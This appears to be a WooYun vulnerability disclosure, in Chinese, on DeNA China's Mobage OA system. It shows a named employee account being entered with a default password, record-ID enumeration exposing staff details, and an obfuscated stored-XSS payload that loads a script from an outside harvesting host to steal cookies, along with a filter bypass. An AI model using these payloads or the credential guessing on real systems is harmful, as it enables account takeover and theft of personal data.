WooYun.org

搜了下梦宝谷，貌似是dena旗下的一个平台。今天发现了对外的OA系统的一个存储型xss。
OA地址是http://system.denachina.com/mobage_oa/

以@dena.com作为关键字在百度里搜,得到一些用户名，比如haiyue.zheng@dena.com，然后尝试使用默认密码123456登录，成功。
在浏览了里面的功能之后发现两个问题
1、越权访问
申请列表可以遍历。
http://system.denachina.com/mobage_oa/index.php/user/absence_info/6653
通过改变后面数字，遍历到所有公司员工姓名、邮箱地址以及管理级别人员信息。
如图

2、存储型xss
F12工具，看到cookie信息里记录了md5_password，没有http only于是开始找xss。
在申请加班处，备注内容过滤不完整，加入xss语句。

<img srx=x onerror='window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,120,115,115,97,110,46,99,111,109,47,88,66,85,67,69,122);document.body.appendChild(window.s)'>

经过测试，发现会有XSS的过滤，Burp Suit抓包，最后提交的数据并不是直接过滤，而似乎是先临时存放到一张表，然后判断里面数据是否有代码注入，然后再决定取舍。
发现当提交的内容中含有部分过滤关键字时候，cookie字段中会少掉flash:old:ab_temp_id，p_1_temp_id等字段。于是抓包补上，最后提交成功，形成存储型xss。

ci_session=a:7:{s:10:"session_id";s:32:"594b9c4d97f0a8de9b8937c75312b573";s:10:"ip_address";s:13:"x.x.x.x";s:10:"user_agent";s:85:"Mozilla/5.0+(X11;+Linux+x86_64;+rv:24.0)+Gecko/20140610+Firefox/24.0+Iceweasel/24.6.0";s:13:"last_activity";i:1407729901;s:9:"user_data";s:0:"";s:20:"flash:old:ab_temp_id";i:3319;s:22:"flash:old:ap_1_temp_id";i:3531;}518aecc1d0c2d8033cd2671950c78e98;

http://system.denachina.com/mobage_oa/index.php/user/absence_info/7174
如图

其实这个xss的形成一是过滤不完善，二是校验逻辑有问题。